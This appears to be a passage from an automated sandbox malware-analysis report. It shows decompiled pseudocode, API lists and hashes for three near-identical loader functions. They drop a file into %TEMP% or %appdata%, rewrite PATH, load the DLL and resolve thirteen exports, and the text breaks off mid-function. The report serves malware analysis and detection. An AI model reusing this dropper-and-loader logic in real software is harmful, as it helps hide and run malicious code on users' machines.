                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040831C, Relevance: 33.6, APIs: 16, Strings: 3, Instructions: 323libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                          			E0040831C(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				intOrPtr _v117;
				void* _t69;
				void* _t96;
				intOrPtr* _t97;
				intOrPtr* _t103;
				intOrPtr* _t108;
				intOrPtr* _t211;
				void* _t226;
				intOrPtr _t244;
				void* _t270;
				intOrPtr _t272;
				intOrPtr _t273;

				_t269 = __esi;
				 *__eax =  *__eax + __eax;
				_t69 = __eax +  *__eax;
				 *_t69 =  *_t69 + _t69;
				asm("das");
				 *_t69 =  *_t69 + _t69;
				_v117 = _v117 + __edx;
				_t272 = _t273;
				_t226 = 0xd;
				do {
					_push(0);
					_push(0);
					_t226 = _t226 - 1;
					_t277 = _t226;
				} while (_t226 != 0);
				_push(_t226);
				_push(__ebx);
				_push(__esi);
				_v8 = _t69;
				E00403980(_v8);
				_push(_t272);
				_push(0x408781);
				_push( *[fs:eax]);
				 *[fs:eax] = _t273;
				 *0x41b0d8 = 0;
				E00406C4C( &_v28, 0x41c7bc, __esi);
				E00406258(_v28, 0x41c7bc,  &_v24, __esi, _t277);
				E00406258(_v24, 0x41c7bc,  &_v20, _t269, _t277);
				E00403D2C( &_v16, _v20);
				_push(L"%TEMP%\\");
				_push(_v16);
				_push(0x4087a8);
				E00403E1C();
				E004062D8(_v36,  &_v32, _t277);
				E00403BBC(0x41c7c0, _v32);
				CreateDirectoryW(E00403D3C( *0x41c7c0), 0);
				E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t269, _t277);
				E0040813C(9,  &_v44);
				E00403DB8( &_v40, _v44,  *0x41c7c0, _t277);
				_t96 = E004076B0(_v40, 0x41c7bc, _v44);
				_t278 = _t96;
				if(_t96 == 0) {
					_push(L"%appdata%\\");
					_push(_v16);
					_push(0x4087a8);
					E00403E1C();
					E004062D8(_v52,  &_v48, _t278);
					E00403BBC(0x41c7c0, _v48);
					CreateDirectoryW(E00403D3C( *0x41c7c0), 0);
					E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t269, _t278);
				}
				_t97 =  *0x41b578; // 0x41c6b0
				_t270 =  *((intOrPtr*)( *_t97))(L"PATH", 0, 0);
				_t279 = _t270;
				if(_t270 > 0) {
					E004040B0( &_v12, _t270);
					_t211 =  *0x41b578; // 0x41c6b0
					 *((intOrPtr*)( *_t211))(L"PATH", E00403D3C(_v12), _t270);
				}
				E00403E1C();
				_t103 =  *0x41b614; // 0x41c6ac
				 *((intOrPtr*)( *_t103))(L"PATH", E00403D3C(_v12), _v12, E004087D8,  *0x41c7c0);
				_t108 =  *0x41b5e4; // 0x41c6b4
				 *((intOrPtr*)( *_t108))(E00403D3C( *0x41c7c0));
				E0040813C(9,  &_v60);
				E00403DB8( &_v56, _v60,  *0x41c7c0, _t279);
				 *0x41c7bc = LoadLibraryExW(E00403D3C(_v56), 0, 8);
				if( *0x41c7bc != 0) {
					E00408120(0x84,  &_v64);
					 *0x41c784 = GetProcAddress( *0x41c7bc, E00403990(_v64));
					E00408120(0x85,  &_v68);
					 *0x41c788 = GetProcAddress( *0x41c7bc, E00403990(_v68));
					E00408120(0x86,  &_v72);
					 *0x41c78c = GetProcAddress( *0x41c7bc, E00403990(_v72));
					E00408120(0x87,  &_v76);
					 *0x41c790 = GetProcAddress( *0x41c7bc, E00403990(_v76));
					E00408120(0x88,  &_v80);
					 *0x41c794 = GetProcAddress( *0x41c7bc, E00403990(_v80));
					E00408120(0x89,  &_v84);
					 *0x41c798 = GetProcAddress( *0x41c7bc, E00403990(_v84));
					E00408120(0x8a,  &_v88);
					 *0x41c79c = GetProcAddress( *0x41c7bc, E00403990(_v88));
					E00408120(0x12,  &_v92);
					 *0x41c7a0 = GetProcAddress( *0x41c7bc, E00403990(_v92));
					E00408120(0x13,  &_v96);
					 *0x41c7a4 = GetProcAddress( *0x41c7bc, E00403990(_v96));
					E00408120(0x14,  &_v100);
					 *0x41c7a8 = GetProcAddress( *0x41c7bc, E00403990(_v100));
					E00408120(0x15,  &_v104);
					 *0x41c7ac = GetProcAddress( *0x41c7bc, E00403990(_v104));
					E00408120(0x16,  &_v108);
					 *0x41c7b0 = GetProcAddress( *0x41c7bc, E00403990(_v108));
					E00408120(0x17,  &_v112);
					 *0x41c7b4 = GetProcAddress( *0x41c7bc, E00403990(_v112));
					if( *0x41c784 != 0 &&  *0x41c788 != 0 &&  *0x41c78c != 0 &&  *0x41c790 != 0 &&  *0x41c794 != 0 &&  *0x41c798 != 0 &&  *0x41c79c != 0 &&  *0x41c7a0 != 0 &&  *0x41c7a4 != 0 &&  *0x41c7a8 != 0 &&  *0x41c7ac != 0 &&  *0x41c7b0 != 0 &&  *0x41c7b4 != 0) {
						 *0x41b0d8 = 1;
					}
				}
				_pop(_t244);
				 *[fs:eax] = _t244;
				_push(E00408788);
				E00403508( &_v112, 0xd);
				E00403B98( &_v60, 8);
				E00403508( &_v28, 3);
				E00403B98( &_v16, 2);
				return E004034E4( &_v8);
			}










































                                                                                                                                                                                          0x0040831c
                                                                                                                                                                                          0x0040831e
                                                                                                                                                                                          0x00408320
                                                                                                                                                                                          0x00408322
                                                                                                                                                                                          0x00408324
                                                                                                                                                                                          0x00408325
                                                                                                                                                                                          0x00408327
                                                                                                                                                                                          0x00408329
                                                                                                                                                                                          0x0040832b
                                                                                                                                                                                          0x00408330
                                                                                                                                                                                          0x00408330
                                                                                                                                                                                          0x00408332
                                                                                                                                                                                          0x00408334
                                                                                                                                                                                          0x00408334
                                                                                                                                                                                          0x00408334
                                                                                                                                                                                          0x00408337
                                                                                                                                                                                          0x00408338
                                                                                                                                                                                          0x00408339
                                                                                                                                                                                          0x0040833b
                                                                                                                                                                                          0x00408341
                                                                                                                                                                                          0x00408352
                                                                                                                                                                                          0x00408353
                                                                                                                                                                                          0x00408358
                                                                                                                                                                                          0x0040835b
                                                                                                                                                                                          0x0040835e
                                                                                                                                                                                          0x00408368
                                                                                                                                                                                          0x00408373
                                                                                                                                                                                          0x0040837e
                                                                                                                                                                                          0x00408389
                                                                                                                                                                                          0x0040838e
                                                                                                                                                                                          0x00408393
                                                                                                                                                                                          0x00408396
                                                                                                                                                                                          0x004083a3
                                                                                                                                                                                          0x004083ae
                                                                                                                                                                                          0x004083b8
                                                                                                                                                                                          0x004083c7
                                                                                                                                                                                          0x004083d1
                                                                                                                                                                                          0x004083de
                                                                                                                                                                                          0x004083eb
                                                                                                                                                                                          0x004083f3
                                                                                                                                                                                          0x004083f8
                                                                                                                                                                                          0x004083fa
                                                                                                                                                                                          0x004083fc
                                                                                                                                                                                          0x00408401
                                                                                                                                                                                          0x00408404
                                                                                                                                                                                          0x00408411
                                                                                                                                                                                          0x0040841c
                                                                                                                                                                                          0x00408426
                                                                                                                                                                                          0x00408435
                                                                                                                                                                                          0x0040843f
                                                                                                                                                                                          0x0040843f
                                                                                                                                                                                          0x0040844d
                                                                                                                                                                                          0x00408456
                                                                                                                                                                                          0x00408458
                                                                                                                                                                                          0x0040845a
                                                                                                                                                                                          0x00408461
                                                                                                                                                                                          0x00408475
                                                                                                                                                                                          0x0040847c
                                                                                                                                                                                          0x0040847c
                                                                                                                                                                                          0x00408490
                                                                                                                                                                                          0x004084a3
                                                                                                                                                                                          0x004084aa
                                                                                                                                                                                          0x004084b4
                                                                                                                                                                                          0x004084bb
                                                                                                                                                                                          0x004084c9
                                                                                                                                                                                          0x004084d6
                                                                                                                                                                                          0x004084e9
                                                                                                                                                                                          0x004084ee
                                                                                                                                                                                          0x004084fc
                                                                                                                                                                                          0x00408512
                                                                                                                                                                                          0x0040851f
                                                                                                                                                                                          0x00408535
                                                                                                                                                                                          0x00408542
                                                                                                                                                                                          0x00408558
                                                                                                                                                                                          0x00408565
                                                                                                                                                                                          0x0040857b
                                                                                                                                                                                          0x00408588
                                                                                                                                                                                          0x0040859e
                                                                                                                                                                                          0x004085ab
                                                                                                                                                                                          0x004085c1
                                                                                                                                                                                          0x004085ce
                                                                                                                                                                                          0x004085e4
                                                                                                                                                                                          0x004085f1
                                                                                                                                                                                          0x00408607
                                                                                                                                                                                          0x00408614
                                                                                                                                                                                          0x0040862a
                                                                                                                                                                                          0x00408637
                                                                                                                                                                                          0x0040864d
                                                                                                                                                                                          0x0040865a
                                                                                                                                                                                          0x00408670
                                                                                                                                                                                          0x0040867d
                                                                                                                                                                                          0x00408693
                                                                                                                                                                                          0x004086a0
                                                                                                                                                                                          0x004086b6
                                                                                                                                                                                          0x004086c2
                                                                                                                                                                                          0x00408730
                                                                                                                                                                                          0x00408730
                                                                                                                                                                                          0x004086c2
                                                                                                                                                                                          0x00408739
                                                                                                                                                                                          0x0040873c
                                                                                                                                                                                          0x0040873f
                                                                                                                                                                                          0x0040874c
                                                                                                                                                                                          0x00408759
                                                                                                                                                                                          0x00408766
                                                                                                                                                                                          0x00408773
                                                                                                                                                                                          0x00408780

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$CreateDirectory$LibraryLoad
                                                                                                                                                                                          • String ID: %TEMP%\$%appdata%\$PATH
                                                                                                                                                                                          • API String ID: 1305945209-1089150275
                                                                                                                                                                                          • Opcode ID: 1a33a2769e6321904e3cdb265ad9754a853bf74ca40744ee91329e9d7d30e973
                                                                                                                                                                                          • Instruction ID: 107c2c44d9e3562d342af0426f92bc8293728700e54ee15747b3200e896e575f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a33a2769e6321904e3cdb265ad9754a853bf74ca40744ee91329e9d7d30e973
                                                                                                                                                                                          • Instruction Fuzzy Hash: 08C12A709002059BDB01EBA9DD86BCE77B8EF49308F20457BB454BB2D6CB78AD05CB59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00408324, Relevance: 33.6, APIs: 16, Strings: 3, Instructions: 319libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 71%
                                                                                                                                                                                          			E00408324(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				intOrPtr _v117;
				void* _t95;
				intOrPtr* _t96;
				intOrPtr* _t102;
				intOrPtr* _t107;
				intOrPtr* _t210;
				void* _t225;
				intOrPtr _t243;
				void* _t269;
				intOrPtr _t271;
				intOrPtr _t272;

				_t268 = __esi;
				asm("das");
				 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax;
				_v117 = _v117 + __edx;
				_t271 = _t272;
				_t225 = 0xd;
				do {
					_push(0);
					_push(0);
					_t225 = _t225 - 1;
					_t274 = _t225;
				} while (_t225 != 0);
				_push(_t225);
				_push(__ebx);
				_push(__esi);
				_v8 = __eax;
				E00403980(_v8);
				_push(_t271);
				_push(0x408781);
				_push( *[fs:eax]);
				 *[fs:eax] = _t272;
				 *0x41b0d8 = 0;
				E00406C4C( &_v28, 0x41c7bc, __esi);
				E00406258(_v28, 0x41c7bc,  &_v24, __esi, _t274);
				E00406258(_v24, 0x41c7bc,  &_v20, _t268, _t274);
				E00403D2C( &_v16, _v20);
				_push(L"%TEMP%\\");
				_push(_v16);
				_push(0x4087a8);
				E00403E1C();
				E004062D8(_v36,  &_v32, _t274);
				E00403BBC(0x41c7c0, _v32);
				CreateDirectoryW(E00403D3C( *0x41c7c0), 0);
				E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t268, _t274);
				E0040813C(9,  &_v44);
				E00403DB8( &_v40, _v44,  *0x41c7c0, _t274);
				_t95 = E004076B0(_v40, 0x41c7bc, _v44);
				_t275 = _t95;
				if(_t95 == 0) {
					_push(L"%appdata%\\");
					_push(_v16);
					_push(0x4087a8);
					E00403E1C();
					E004062D8(_v52,  &_v48, _t275);
					E00403BBC(0x41c7c0, _v48);
					CreateDirectoryW(E00403D3C( *0x41c7c0), 0);
					E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t268, _t275);
				}
				_t96 =  *0x41b578; // 0x41c6b0
				_t269 =  *((intOrPtr*)( *_t96))(L"PATH", 0, 0);
				_t276 = _t269;
				if(_t269 > 0) {
					E004040B0( &_v12, _t269);
					_t210 =  *0x41b578; // 0x41c6b0
					 *((intOrPtr*)( *_t210))(L"PATH", E00403D3C(_v12), _t269);
				}
				E00403E1C();
				_t102 =  *0x41b614; // 0x41c6ac
				 *((intOrPtr*)( *_t102))(L"PATH", E00403D3C(_v12), _v12, E004087D8,  *0x41c7c0);
				_t107 =  *0x41b5e4; // 0x41c6b4
				 *((intOrPtr*)( *_t107))(E00403D3C( *0x41c7c0));
				E0040813C(9,  &_v60);
				E00403DB8( &_v56, _v60,  *0x41c7c0, _t276);
				 *0x41c7bc = LoadLibraryExW(E00403D3C(_v56), 0, 8);
				if( *0x41c7bc != 0) {
					E00408120(0x84,  &_v64);
					 *0x41c784 = GetProcAddress( *0x41c7bc, E00403990(_v64));
					E00408120(0x85,  &_v68);
					 *0x41c788 = GetProcAddress( *0x41c7bc, E00403990(_v68));
					E00408120(0x86,  &_v72);
					 *0x41c78c = GetProcAddress( *0x41c7bc, E00403990(_v72));
					E00408120(0x87,  &_v76);
					 *0x41c790 = GetProcAddress( *0x41c7bc, E00403990(_v76));
					E00408120(0x88,  &_v80);
					 *0x41c794 = GetProcAddress( *0x41c7bc, E00403990(_v80));
					E00408120(0x89,  &_v84);
					 *0x41c798 = GetProcAddress( *0x41c7bc, E00403990(_v84));
					E00408120(0x8a,  &_v88);
					 *0x41c79c = GetProcAddress( *0x41c7bc, E00403990(_v88));
					E00408120(0x12,  &_v92);
					 *0x41c7a0 = GetProcAddress( *0x41c7bc, E00403990(_v92));
					E00408120(0x13,  &_v96);
					 *0x41c7a4 = GetProcAddress( *0x41c7bc, E00403990(_v96));
					E00408120(0x14,  &_v100);
					 *0x41c7a8 = GetProcAddress( *0x41c7bc, E00403990(_v100));
					E00408120(0x15,  &_v104);
					 *0x41c7ac = GetProcAddress( *0x41c7bc, E00403990(_v104));
					E00408120(0x16,  &_v108);
					 *0x41c7b0 = GetProcAddress( *0x41c7bc, E00403990(_v108));
					E00408120(0x17,  &_v112);
					 *0x41c7b4 = GetProcAddress( *0x41c7bc, E00403990(_v112));
					if( *0x41c784 != 0 &&  *0x41c788 != 0 &&  *0x41c78c != 0 &&  *0x41c790 != 0 &&  *0x41c794 != 0 &&  *0x41c798 != 0 &&  *0x41c79c != 0 &&  *0x41c7a0 != 0 &&  *0x41c7a4 != 0 &&  *0x41c7a8 != 0 &&  *0x41c7ac != 0 &&  *0x41c7b0 != 0 &&  *0x41c7b4 != 0) {
						 *0x41b0d8 = 1;
					}
				}
				_pop(_t243);
				 *[fs:eax] = _t243;
				_push(E00408788);
				E00403508( &_v112, 0xd);
				E00403B98( &_v60, 8);
				E00403508( &_v28, 3);
				E00403B98( &_v16, 2);
				return E004034E4( &_v8);
			}









































                                                                                                                                                                                          0x00408324
                                                                                                                                                                                          0x00408324
                                                                                                                                                                                          0x00408325
                                                                                                                                                                                          0x00408327
                                                                                                                                                                                          0x00408329
                                                                                                                                                                                          0x0040832b
                                                                                                                                                                                          0x00408330
                                                                                                                                                                                          0x00408330
                                                                                                                                                                                          0x00408332
                                                                                                                                                                                          0x00408334
                                                                                                                                                                                          0x00408334
                                                                                                                                                                                          0x00408334
                                                                                                                                                                                          0x00408337
                                                                                                                                                                                          0x00408338
                                                                                                                                                                                          0x00408339
                                                                                                                                                                                          0x0040833b
                                                                                                                                                                                          0x00408341
                                                                                                                                                                                          0x00408352
                                                                                                                                                                                          0x00408353
                                                                                                                                                                                          0x00408358
                                                                                                                                                                                          0x0040835b
                                                                                                                                                                                          0x0040835e
                                                                                                                                                                                          0x00408368
                                                                                                                                                                                          0x00408373
                                                                                                                                                                                          0x0040837e
                                                                                                                                                                                          0x00408389
                                                                                                                                                                                          0x0040838e
                                                                                                                                                                                          0x00408393
                                                                                                                                                                                          0x00408396
                                                                                                                                                                                          0x004083a3
                                                                                                                                                                                          0x004083ae
                                                                                                                                                                                          0x004083b8
                                                                                                                                                                                          0x004083c7
                                                                                                                                                                                          0x004083d1
                                                                                                                                                                                          0x004083de
                                                                                                                                                                                          0x004083eb
                                                                                                                                                                                          0x004083f3
                                                                                                                                                                                          0x004083f8
                                                                                                                                                                                          0x004083fa
                                                                                                                                                                                          0x004083fc
                                                                                                                                                                                          0x00408401
                                                                                                                                                                                          0x00408404
                                                                                                                                                                                          0x00408411
                                                                                                                                                                                          0x0040841c
                                                                                                                                                                                          0x00408426
                                                                                                                                                                                          0x00408435
                                                                                                                                                                                          0x0040843f
                                                                                                                                                                                          0x0040843f
                                                                                                                                                                                          0x0040844d
                                                                                                                                                                                          0x00408456
                                                                                                                                                                                          0x00408458
                                                                                                                                                                                          0x0040845a
                                                                                                                                                                                          0x00408461
                                                                                                                                                                                          0x00408475
                                                                                                                                                                                          0x0040847c
                                                                                                                                                                                          0x0040847c
                                                                                                                                                                                          0x00408490
                                                                                                                                                                                          0x004084a3
                                                                                                                                                                                          0x004084aa
                                                                                                                                                                                          0x004084b4
                                                                                                                                                                                          0x004084bb
                                                                                                                                                                                          0x004084c9
                                                                                                                                                                                          0x004084d6
                                                                                                                                                                                          0x004084e9
                                                                                                                                                                                          0x004084ee
                                                                                                                                                                                          0x004084fc
                                                                                                                                                                                          0x00408512
                                                                                                                                                                                          0x0040851f
                                                                                                                                                                                          0x00408535
                                                                                                                                                                                          0x00408542
                                                                                                                                                                                          0x00408558
                                                                                                                                                                                          0x00408565
                                                                                                                                                                                          0x0040857b
                                                                                                                                                                                          0x00408588
                                                                                                                                                                                          0x0040859e
                                                                                                                                                                                          0x004085ab
                                                                                                                                                                                          0x004085c1
                                                                                                                                                                                          0x004085ce
                                                                                                                                                                                          0x004085e4
                                                                                                                                                                                          0x004085f1
                                                                                                                                                                                          0x00408607
                                                                                                                                                                                          0x00408614
                                                                                                                                                                                          0x0040862a
                                                                                                                                                                                          0x00408637
                                                                                                                                                                                          0x0040864d
                                                                                                                                                                                          0x0040865a
                                                                                                                                                                                          0x00408670
                                                                                                                                                                                          0x0040867d
                                                                                                                                                                                          0x00408693
                                                                                                                                                                                          0x004086a0
                                                                                                                                                                                          0x004086b6
                                                                                                                                                                                          0x004086c2
                                                                                                                                                                                          0x00408730
                                                                                                                                                                                          0x00408730
                                                                                                                                                                                          0x004086c2
                                                                                                                                                                                          0x00408739
                                                                                                                                                                                          0x0040873c
                                                                                                                                                                                          0x0040873f
                                                                                                                                                                                          0x0040874c
                                                                                                                                                                                          0x00408759
                                                                                                                                                                                          0x00408766
                                                                                                                                                                                          0x00408773
                                                                                                                                                                                          0x00408780

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$CreateDirectory$LibraryLoad
                                                                                                                                                                                          • String ID: %TEMP%\$%appdata%\$PATH
                                                                                                                                                                                          • API String ID: 1305945209-1089150275
                                                                                                                                                                                          • Opcode ID: 79934f1c985d954dbaeb093b53ec4003d150750486ead7d04ba29fc2d927e3f7
                                                                                                                                                                                          • Instruction ID: 2d8dd4a76802c8c05b7f9f6fb250e21a54e9375513618aa46567d80ce5eb0686
                                                                                                                                                                                          • Opcode Fuzzy Hash: 79934f1c985d954dbaeb093b53ec4003d150750486ead7d04ba29fc2d927e3f7
                                                                                                                                                                                          • Instruction Fuzzy Hash: A7C12A70A002059BDB01EBA9DD86BCE77B8EF45308F20453BB454BB3D5CB78AD058B59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00408328, Relevance: 33.6, APIs: 16, Strings: 3, Instructions: 317libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                          			E00408328(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				void* _t93;
				intOrPtr* _t94;
				intOrPtr* _t100;
				intOrPtr* _t105;
				intOrPtr* _t208;
				void* _t223;
				intOrPtr _t241;
				void* _t267;
				intOrPtr _t269;
				intOrPtr _t270;

				_t266 = __esi;
				_t269 = _t270;
				_t223 = 0xd;
				do {
					_push(0);
					_push(0);
					_t223 = _t223 - 1;
					_t271 = _t223;
				} while (_t223 != 0);
				_push(_t223);
				_push(__ebx);
				_push(__esi);
				_v8 = __eax;
				E00403980(_v8);
				_push(_t269);
				_push(0x408781);
				_push( *[fs:eax]);
				 *[fs:eax] = _t270;
				 *0x41b0d8 = 0;
				E00406C4C( &_v28, 0x41c7bc, __esi);
				E00406258(_v28, 0x41c7bc,  &_v24, __esi, _t271);
				E00406258(_v24, 0x41c7bc,  &_v20, _t266, _t271);
				E00403D2C( &_v16, _v20);
				_push(L"%TEMP%\\");
				_push(_v16);
				_push(0x4087a8);
				E00403E1C();
				E004062D8(_v36,  &_v32, _t271);
				E00403BBC(0x41c7c0, _v32);
				CreateDirectoryW(E00403D3C( *0x41c7c0), 0);
				E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t266, _t271);
				E0040813C(9,  &_v44);
				E00403DB8( &_v40, _v44,  *0x41c7c0, _t271);
				_t93 = E004076B0(_v40, 0x41c7bc, _v44);
				_t272 = _t93;
				if(_t93 == 0) {
					_push(L"%appdata%\\");
					_push(_v16);
					_push(0x4087a8);
					E00403E1C();
					E004062D8(_v52,  &_v48, _t272);
					E00403BBC(0x41c7c0, _v48);
					CreateDirectoryW(E00403D3C( *0x41c7c0), 0);
					E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t266, _t272);
				}
				_t94 =  *0x41b578; // 0x41c6b0
				_t267 =  *((intOrPtr*)( *_t94))(L"PATH", 0, 0);
				_t273 = _t267;
				if(_t267 > 0) {
					E004040B0( &_v12, _t267);
					_t208 =  *0x41b578; // 0x41c6b0
					 *((intOrPtr*)( *_t208))(L"PATH", E00403D3C(_v12), _t267);
				}
				E00403E1C();
				_t100 =  *0x41b614; // 0x41c6ac
				 *((intOrPtr*)( *_t100))(L"PATH", E00403D3C(_v12), _v12, E004087D8,  *0x41c7c0);
				_t105 =  *0x41b5e4; // 0x41c6b4
				 *((intOrPtr*)( *_t105))(E00403D3C( *0x41c7c0));
				E0040813C(9,  &_v60);
				E00403DB8( &_v56, _v60,  *0x41c7c0, _t273);
				 *0x41c7bc = LoadLibraryExW(E00403D3C(_v56), 0, 8);
				if( *0x41c7bc != 0) {
					E00408120(0x84,  &_v64);
					 *0x41c784 = GetProcAddress( *0x41c7bc, E00403990(_v64));
					E00408120(0x85,  &_v68);
					 *0x41c788 = GetProcAddress( *0x41c7bc, E00403990(_v68));
					E00408120(0x86,  &_v72);
					 *0x41c78c = GetProcAddress( *0x41c7bc, E00403990(_v72));
					E00408120(0x87,  &_v76);
					 *0x41c790 = GetProcAddress( *0x41c7bc, E00403990(_v76));
					E00408120(0x88,  &_v80);
					 *0x41c794 = GetProcAddress( *0x41c7bc, E00403990(_v80));
					E00408120(0x89,  &_v84);
					 *0x41c798 = GetProcAddress( *0x41c7bc, E00403990(_v84));
					E00408120(0x8a,  &_v88);
					 *0x41c79c = GetProcAddress( *0x41c7bc, E00403990(_v88));
					E00408120(0x12,  &_v92);
					 *0x41c7a0 = GetProcAddress( *0x41c7bc, E00403990(_v92));
					E00408120(0x13,  &_v96);
					 *0x41c7a4 = GetProcAddress( *0x41c7bc, E00403990(_v96));
					E00408120(0x14,  &_v100);
					 *0x41c7a8 = GetProcAddress( *0x41c7bc, E00403990(_v100));
					E00408120(0x15,  &_v104);
					 *0x41c7ac = GetProcAddress( *0x41c7bc, E00403990(_v104));
					E00408120(0x16,  &_v108);
					 *0x41c7b0 = GetProcAddress( *0x41c7bc, E00403990(_v108));
					E00408120(0x17,  &_v112);
					 *0x41c7b4 = GetProcAddress( *0x41c7bc, E00403990(_v112));
					if( *0x41c784 != 0 &&  *0x41c788 != 0 &&  *0x41c78c != 0 &&  *0x41c790 != 0 &&  *0x41c794 != 0 &&  *0x41c798 != 0 &&  *0x41c79c != 0 &&  *0x41c7a0 != 0 &&  *0x41c7a4 != 0 &&  *0x41c7a8 != 0 &&  *0x41c7ac != 0 &&  *0x41c7b0 != 0 &&  *0x41c7b4 != 0) {
						 *0x41b0d8 = 1;
					}
				}
				_pop(_t241);
				 *[fs:eax] = _t241;
